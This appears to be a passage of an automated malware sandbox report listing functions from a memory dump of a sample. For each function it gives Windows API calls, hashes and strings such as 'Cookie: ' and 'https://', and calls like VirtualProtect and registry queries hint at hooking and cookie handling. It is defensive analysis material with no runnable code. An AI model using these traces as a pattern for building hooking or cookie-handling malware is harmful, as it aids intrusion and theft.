Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: bf3c49fadf8ed024d31506c355382f48a24729649fa5fe7d0181cf8e53b57853
Instruction ID: c51cc02b984a7ce4b1287ad630bdef04f47d941eb8e672538f71fe98a89c2f60
Opcode Fuzzy Hash: bf3c49fadf8ed024d31506c355382f48a24729649fa5fe7d0181cf8e53b57853
Instruction Fuzzy Hash: D731717064020AAFDB21AF29DC45F9A7FA9FF05360F10452AF91AD7290D730E921CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8F750, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 02B8F78C
memset.NTDLL ref: 02B8F808
memset.NTDLL ref: 02B8F81D

Strings

{&/, xrefs: 02B8F791

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memset$AllocateHeapmemcpy
String ID: {&/
API String ID: 1529149438-314889142
Opcode ID: 994ed10fd492868bc916933aaf2103d39f54329bcb565fe1fa7311b9b563b558
Instruction ID: 9ecd2ceda075fa4a690b01bb535c7798b3cd6f5e1acefbcd3e392662114b2bf4
Opcode Fuzzy Hash: 994ed10fd492868bc916933aaf2103d39f54329bcb565fe1fa7311b9b563b558
Instruction Fuzzy Hash: 6821ABB2508311ABC710FF25DC80B6BBBE9EF89350F040969F99897251E730E614CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02B78BC3, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B78BE5
lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 02B78C29
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 02B78C6F
CloseHandle.KERNEL32(?,?,?,?,?), ref: 02B78C92

Part of subcall function 02B8EBD0: GetTickCount.KERNEL32 ref: 02B8EBE0
Part of subcall function 02B8EBD0: CreateFileW.KERNEL32(02B90C37,80000000,00000003,02B9E0D4,00000003,00000000,00000000,?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EBFD
Part of subcall function 02B8EBD0: GetFileSize.KERNEL32(02B90C37,00000000,Local\,00000001,?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EC29
Part of subcall function 02B8EBD0: CreateFileMappingA.KERNEL32(02B90C37,02B9E0D4,00000002,00000000,00000000,02B90C37), ref: 02B8EC3D
Part of subcall function 02B8EBD0: lstrlen.KERNEL32(02B90C37,?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EC59
Part of subcall function 02B8EBD0: lstrcpy.KERNEL32(?,02B90C37), ref: 02B8EC69
Part of subcall function 02B8EBD0: HeapFree.KERNEL32(00000000,02B90C37,?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EC84
Part of subcall function 02B8EBD0: CloseHandle.KERNEL32(02B90C37,Local\,00000001,?,02B90C37), ref: 02B8EC96

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 70cb56034a37b711ed423a24d0a3f5ee3120f15c1e1adfe372a093df5fdefc3f
Instruction ID: 7b9f8cb3a990dba0cad80bc0dddfa62d355e3d6a9fcd3935b32445c97110b556
Opcode Fuzzy Hash: 70cb56034a37b711ed423a24d0a3f5ee3120f15c1e1adfe372a093df5fdefc3f
Instruction Fuzzy Hash: D8219A71941208EBDB20DFB5DE48EEE7BB9EF48354F1401A6F928A2160E731D449DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B86658, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B86687
lstrlen.KERNEL32(00000000), ref: 02B86697

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

strcpy.NTDLL ref: 02B866AE
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 02B866B8

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: 4ff69fdbf27aa8b805ad0e1767b085a46f17d022d1f7cdf4cadb8b9e46ba9265
Instruction ID: 707211b070202524cf07ca75d8a29f4a09f3bdd07f6024b9f9a792ab1579060f
Opcode Fuzzy Hash: 4ff69fdbf27aa8b805ad0e1767b085a46f17d022d1f7cdf4cadb8b9e46ba9265
Instruction Fuzzy Hash: C721CDBA900302AFE720BF24D989F6A77FCEF45395F008859F95A87280EB75D410CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02B95E4D, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B95E63
RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B95E7E
GetLastError.KERNEL32 ref: 02B95EEC
GetLastError.KERNEL32 ref: 02B95EFB

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 78fa1f3b4ce65d8a6c10f179af0a8c90de3876ccae8ae5ccd90caf69d7a7fec7
Instruction ID: 6f24a0a6c177460e41c4605ae78c8dd98237be878ea5de8c92069655e64cc165
Opcode Fuzzy Hash: 78fa1f3b4ce65d8a6c10f179af0a8c90de3876ccae8ae5ccd90caf69d7a7fec7
Instruction Fuzzy Hash: AA217A32840209EFCF22CFA8D948A9E7BB8FF04754F10459AF905A3200DB34DA61DF91

Uniqueness

Uniqueness Score: -1.00%

Function 02B90120, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8526B: GetTickCount.KERNEL32 ref: 02B85281
Part of subcall function 02B8526B: wsprintfA.USER32 ref: 02B852C2
Part of subcall function 02B8526B: GetModuleHandleA.KERNEL32(00000000), ref: 02B852D4

GetModuleHandleA.KERNEL32(00000000,?), ref: 02B90147
GetLastError.KERNEL32 ref: 02B90161
RtlExitUserThread.NTDLL(?), ref: 02B9017B
GetLastError.KERNEL32 ref: 02B901BB

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
String ID:
API String ID: 1798890819-0
Opcode ID: 3f2b84a1790c72d6736ce2e75691273d5c74840eaec1fcb528e2928045a28d9f
Instruction ID: f8b84707ef87f8af599c686b0d37af1eb83d0e6a777011af64e2f9bba0e44bd2
Opcode Fuzzy Hash: 3f2b84a1790c72d6736ce2e75691273d5c74840eaec1fcb528e2928045a28d9f
Instruction Fuzzy Hash: 2A118C71440241AF9B10BB26EE88D7B7BBCEB866A07040E29F855C3040DB309894CB31

Uniqueness

Uniqueness Score: -1.00%

Function 02B8F643, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 02B73CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,02B8F65A), ref: 02B73CCA

CreateFileA.KERNEL32(02B8E1EA,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,02B8E1EA,00000000), ref: 02B8F695
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8E1EA,4C72644C,?,00000B54), ref: 02B8F6A7
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,02B8E1EA,4C72644C,?,00000B54), ref: 02B8F6BF
CloseHandle.KERNEL32(?,?,?,?,02B8E1EA,4C72644C,?,00000B54), ref: 02B8F6DA

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: e935bd7ccb617c6fe17283b472ec5431c81a68d98a2eef4c937a140e9793c257
Instruction ID: 6602b9f95c4cbb98300c155377867ceb214d8445e737453a8e37fef2b88d3bee
Opcode Fuzzy Hash: e935bd7ccb617c6fe17283b472ec5431c81a68d98a2eef4c937a140e9793c257
Instruction Fuzzy Hash: 5D115E71A00118BBDB21BEA5CC88EFFBE7EEF02794F504195F518E6050D7319A50DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B924E0, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(6AD68BFC,02B7619F,?,02B7619F,00000004), ref: 02B92518

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 02B9252F
StrChrA.SHLWAPI(00000000,0000002E,?,02B7619F,00000004), ref: 02B92538
GetModuleHandleA.KERNEL32(00000000,?,02B7619F,00000004), ref: 02B92556

Part of subcall function 02B71000: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,02B9D518,00000000,?), ref: 02B710D7
Part of subcall function 02B71000: VirtualProtect.KERNELBASE(00000000,00000004,02B9D518,02B9D518,?,00000004,00000000,00000004,02B9D518,00000000,?,00000000,00000002,02B9A568,0000001C,02B85176), ref: 02B710F2
Part of subcall function 02B71000: RtlEnterCriticalSection.NTDLL(02B9E240), ref: 02B71116

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 3cbe49b85dc9180f9b583a90067206d0920a8b188e4476b99e16940e2c628d79
Instruction ID: 6e919482f203318b32155d3da0e02df1b534f14743a12c9060a843625199dd2f
Opcode Fuzzy Hash: 3cbe49b85dc9180f9b583a90067206d0920a8b188e4476b99e16940e2c628d79
Instruction Fuzzy Hash: 2C217974E00205EFDF10DF68C9A9BAEBBF9EF45344F1485A9E80697252D7B0DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B82426, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 02B82441
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 02B82465
RegCloseKey.ADVAPI32(?), ref: 02B824BD

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 02B8248E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 1f8efa338a0910f26ca9099826917ef798817a3ec5346761ee0eb53cc6f48b14
Instruction ID: 5cfa059bcab4886fc5f31d5415ff18ad036fe497a5b34dfb3d120e9a4cc24644
Opcode Fuzzy Hash: 1f8efa338a0910f26ca9099826917ef798817a3ec5346761ee0eb53cc6f48b14
Instruction Fuzzy Hash: D521E7B990014DFFDF11AF99D9808EEBBBEEF44344F1884A6E909A7210D3719A51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B9C6, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8A40B,00000000,?,?,02B94BA0,00000000,05AE8D60), ref: 02B8B9D1
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B8B9E9
memcpy.NTDLL(00000000,?,-00000008,?,?,?,02B8A40B,00000000,?,?,02B94BA0,00000000,05AE8D60), ref: 02B8BA2D
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 02B8BA4E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 3e726a15301238cf5b77b398fddbbd8a828642244359de9d6492c4f95e3bf2e1
Instruction ID: 98b684dd0b12335e606fb61a9c2f0d40f82084ce4e186a821b592b148acc1552
Opcode Fuzzy Hash: 3e726a15301238cf5b77b398fddbbd8a828642244359de9d6492c4f95e3bf2e1
Instruction Fuzzy Hash: 4811E972A00215AFC710DF69DD85E9EBBAEDB913A0B0502B6F518D7240EB70DA15C760

Uniqueness

Uniqueness Score: -1.00%

Function 02B825FA, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,?,7612D3B0,05AE8D54,?,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82620
StrTrimA.SHLWAPI(?,02B9A48C,00000000,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B8263F
StrChrA.SHLWAPI(?,?,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82650
StrTrimA.SHLWAPI(00000001,02B9A48C,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82662

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 1adfcd6129bb732344f1195a8eb65af5a1229a43a4b367183261d393528ead48
Instruction ID: 177926c1b5d00cad497f246483f907267b0d7612b4ad5e2c9b3fb946aabbcca6
Opcode Fuzzy Hash: 1adfcd6129bb732344f1195a8eb65af5a1229a43a4b367183261d393528ead48
Instruction Fuzzy Hash: 34114C75500249BFDB01AF69C984EAA7BB8EF86795F148059FC099B201D774DA40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B84151, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7F60A: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B7F639
Part of subcall function 02B7F60A: HeapFree.KERNEL32(00000000,00000000,?,?,02B84161,00000000,00000000,?,00000000,?,02B81FAB,?,?,?,?,?), ref: 02B7F65C

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,02B81FAB,?,?,?,?,?,00000022,00000000,00000000), ref: 02B8418B

Part of subcall function 02B914AB: lstrlen.KERNEL32(00000000,00000000,00000000,76D25520,?,?,00000022,00000000,00000000,00000000,?,?), ref: 02B914C2
Part of subcall function 02B914AB: lstrlen.KERNEL32(?), ref: 02B914CA
Part of subcall function 02B914AB: lstrlen.KERNEL32(?), ref: 02B91535
Part of subcall function 02B914AB: RtlAllocateHeap.NTDLL(00000000,?), ref: 02B91560
Part of subcall function 02B914AB: memcpy.NTDLL(00000000,00000002,?), ref: 02B91571
Part of subcall function 02B914AB: memcpy.NTDLL(00000000,?,?), ref: 02B91587
Part of subcall function 02B914AB: memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 02B91599
Part of subcall function 02B914AB: memcpy.NTDLL(00000000,02B983E4,00000002,00000000,?,?,00000000,?,?), ref: 02B915AC
Part of subcall function 02B914AB: memcpy.NTDLL(00000000,?,00000002), ref: 02B915C1

HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,02B81FAB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 02B841D7

Strings

Cookie: , xrefs: 02B84173
https://, xrefs: 02B8419A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$Freelstrlen$Allocate
String ID: Cookie: $https://
API String ID: 2465664858-1563071917
Opcode ID: 086acfc4ee5d64b1a4f4ccf91504b96e7187477e756a76611f16654dfa515557
Instruction ID: 2cb3af9a1d3bfa0ba5a8460c4113a9054f8c63f68848e7bc665b356a38852813
Opcode Fuzzy Hash: 086acfc4ee5d64b1a4f4ccf91504b96e7187477e756a76611f16654dfa515557
Instruction Fuzzy Hash: A0015E32540256BBDB227E2ADC44FBE7F79DB85BA4F058154FD08A7250C730D991DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B88215, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,02B9493A,00000000,00000000), ref: 02B88233
GetLastError.KERNEL32(?,00000000,?,02B9493A,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,02B8B1A8,?,0000001E), ref: 02B8823B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 7267f03162aaa40fe9f15522a52c976b340de4609b13de79734270f4df5a640f
Instruction ID: 4f68df537eceba3b57cf6adf9e58882db6a5faa93c9d1f31bfbd5a84a1c32884
Opcode Fuzzy Hash: 7267f03162aaa40fe9f15522a52c976b340de4609b13de79734270f4df5a640f
Instruction Fuzzy Hash: B401AC355446557F96307E765C48C1BBBADEBC77A0B500B5DF5AD93240DB309C04C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 02B85B4A, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02B85B57
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 02B85B7D
lstrcpy.KERNEL32(00000014,?), ref: 02B85BA2
memcpy.NTDLL(?,?,?), ref: 02B85BAF

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: df52ff285a70c628458f46be01be9ded866270e60c17a1c99acc44592254d901
Instruction ID: 346d09c5127b14acec75baaf27ac259e6ae51082e9597bce8a186ec4a5ed28f3
Opcode Fuzzy Hash: df52ff285a70c628458f46be01be9ded866270e60c17a1c99acc44592254d901
Instruction Fuzzy Hash: 391146B590030AEFCB21DF58D984E9ABBF9FB49704F108969E85987210D770E914CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B741E7, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 02B741FA
lstrlen.KERNEL32(05AE8BC0), ref: 02B7421B
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 02B74233
lstrcpy.KERNEL32(00000000,05AE8BC0), ref: 02B74245

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 5a58e700611cf9f6f7ce10b01c1d5ef5f49c84e8a161085e95a8ae5821ad550e
Instruction ID: c522c7f96df93045d6d3e704d93f7ed6f9e7739a1fb837b4f207ae59b44a2500
Opcode Fuzzy Hash: 5a58e700611cf9f6f7ce10b01c1d5ef5f49c84e8a161085e95a8ae5821ad550e
Instruction Fuzzy Hash: 4301D676D00244EFC711AFA9A888B6EBFBCEB99342F0045A8E959D3241D7309624CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8CFD0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(?,Blocked), ref: 02B8CFEC
lstrcmpi.KERNEL32(?,Main), ref: 02B8D021

Strings

Main, xrefs: 02B8D01B
Blocked, xrefs: 02B8CFE6

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrcmpi
String ID: Blocked$Main
API String ID: 1586166983-1966386946
Opcode ID: 4a06011d60e1d66348f6d4523b0761d6b47d48ccd27ec002ec973423bf679960
Instruction ID: 80b1c072be3b9528c06d13156dd461e7191a3377424411b2e7959956847c50e8
Opcode Fuzzy Hash: 4a06011d60e1d66348f6d4523b0761d6b47d48ccd27ec002ec973423bf679960
Instruction Fuzzy Hash: 2C015E3520020AAB9B11FE759C90D7B376EFF85794704489AFC1997151CB35D822DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B92AED, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,7612D3B0,00000000,?,02B765AB,00000000,76D7F710,00000000,00000000,?,?,02B958C6,?,?), ref: 02B92AF4
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 02B92B0C
memcpy.NTDLL(0000000C,02B720D2,00000001,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B92B22

Part of subcall function 02B825FA: StrChrA.SHLWAPI(?,?,7612D3B0,05AE8D54,?,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82620
Part of subcall function 02B825FA: StrTrimA.SHLWAPI(?,02B9A48C,00000000,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B8263F
Part of subcall function 02B825FA: StrChrA.SHLWAPI(?,?,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82650
Part of subcall function 02B825FA: StrTrimA.SHLWAPI(00000001,02B9A48C,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82662

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 02B92B54

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrlenmemcpy
String ID:
API String ID: 1635803283-0
Opcode ID: 65a673fd23c0fb5c615d1da1a726bfca5239152343f96bbfbde30d769ed83fdf
Instruction ID: 7acc52d2d027571c61ffa8d0d2371e7f3c0a91532a48d6333e087095db04c392
Opcode Fuzzy Hash: 65a673fd23c0fb5c615d1da1a726bfca5239152343f96bbfbde30d769ed83fdf
Instruction Fuzzy Hash: C101DB32E40305BBEB215E22ED85F2B7BE9FB81BA1F004975FA09D6090C7709815DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B91415, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B91420
Sleep.KERNEL32(0000000A,?,?,?,02B8375B,00000000,?,00000029,02B9E088,02B7AC22,?), ref: 02B9142A
SetEvent.KERNEL32(?,?,?,02B8375B,00000000,?,00000029,02B9E088,02B7AC22,?), ref: 02B91481
RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B914A0

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: 9c8860599055dd5d5d66356c78721161055bb6ea1c64dd6d4a941a1f98ab2784
Instruction ID: 06336911e25c4131ea45a31aac048b419f78df6eb41b51e0c2297cfdf06e4054
Opcode Fuzzy Hash: 9c8860599055dd5d5d66356c78721161055bb6ea1c64dd6d4a941a1f98ab2784
Instruction Fuzzy Hash: B4017571E90305FBEB10EB69DE45B6A3AA8EB05781F004962F709D7181D7709920DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B1E7, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

RtlInitializeCriticalSection.NTDLL(02B9E240), ref: 02B8B20B
RtlInitializeCriticalSection.NTDLL(02B9E220), ref: 02B8B221
GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B917C0), ref: 02B8B232
GetModuleHandleA.KERNEL32(02B9F01D), ref: 02B8B25F

Part of subcall function 02B8E9BE: GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00000001), ref: 02B8E9CF
Part of subcall function 02B8E9BE: LoadLibraryA.KERNEL32(NTDSAPI.DLL,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B8EA69
Part of subcall function 02B8E9BE: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B8EA74

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: f0282a664b814672a99a4c4bc39a5fe3bfdef503db199228ac589738bdd49c98
Instruction ID: eb3e1fb65a557ab390320a2d9a8f39f05a0d3ebbcda093b8b5bfc14bc2394321
Opcode Fuzzy Hash: f0282a664b814672a99a4c4bc39a5fe3bfdef503db199228ac589738bdd49c98
Instruction Fuzzy Hash: 7901CC71D80210DBEB14EF7AAA8AA097FA4F78A3947000D7BE98DC3240C770D4A0CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02B85195, Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

Part of subcall function 02B74B29: lstrlen.KERNEL32 ref: 02B74B2E
Part of subcall function 02B74B29: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 02B74B43
Part of subcall function 02B74B29: wsprintfA.USER32 ref: 02B74B58
Part of subcall function 02B74B29: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 02B74B74

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02B851B9
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02B851C8
CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02B851D1
GetLastError.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02B851D9

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: 5580dbb18f8b9980bd54e347f10e035e223276ac928e7674909591b56fa01df2
Instruction ID: e6f129dee0f7e180e30d5690b6ee0683cf453e0aeea6940e904934f8221035af
Opcode Fuzzy Hash: 5580dbb18f8b9980bd54e347f10e035e223276ac928e7674909591b56fa01df2
Instruction Fuzzy Hash: 9AF0EC70780200BAF23036B46C8EF7B126DDB467AAF110BA8F61AE20C0DBA40D50C661

Uniqueness

Uniqueness Score: -1.00%

Function 02B7F454, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 02B7F466

Part of subcall function 02B84241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,02B81ED8), ref: 02B84282
Part of subcall function 02B84241: GetLastError.KERNEL32 ref: 02B8428C
Part of subcall function 02B84241: WaitForSingleObject.KERNEL32(000000C8), ref: 02B842B1
Part of subcall function 02B84241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 02B842D2
Part of subcall function 02B84241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 02B842FA
Part of subcall function 02B84241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 02B8430F
Part of subcall function 02B84241: SetEndOfFile.KERNEL32(00000006), ref: 02B8431C
Part of subcall function 02B84241: CloseHandle.KERNEL32(00000006), ref: 02B84334

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,02B7A1BE,.dll,?,00001000,?,?,?), ref: 02B7F489
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,02B7A1BE,.dll,?,00001000,?,?,?), ref: 02B7F4AB
GetLastError.KERNEL32(?,02B7A1BE,.dll,?,00001000,?,?,?), ref: 02B7F4BF

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
